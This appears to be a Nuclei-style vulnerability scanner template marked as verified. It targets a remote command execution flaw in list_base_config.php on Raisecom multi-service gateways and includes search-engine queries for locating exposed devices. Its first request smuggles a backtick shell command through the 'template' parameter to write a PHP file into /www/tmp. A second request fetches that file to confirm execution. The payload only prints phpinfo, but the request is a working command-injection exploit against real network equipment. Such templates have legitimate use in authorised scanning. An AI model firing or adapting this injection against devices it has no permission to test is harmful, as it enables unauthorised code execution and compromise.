id: Raisecom_gateway_list_base_config_RCE

info:
  name: Raisecom_gateway_list_base_config_RCE
  author: HK
  severity: critical
  description: 瑞斯康达-多业务智能网关 list_base_config.php 存在远程命令执行漏洞
  metadata:
    max-request: 2
    Fofa-query: body="/images/raisecom/back.gif"
    Quake-query: body="/images/raisecom/back.gif"
    Hunter-query: body="/images/raisecom/back.gif"
    verified: true

http:
- raw:
  - |+
    @timeout: 30s
    GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Connection: close

  - |+
    @timeout: 30s
    GET /tmp/test.php HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

  max-redirects: 3
  cookie-reuse: true
  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
      - php.ini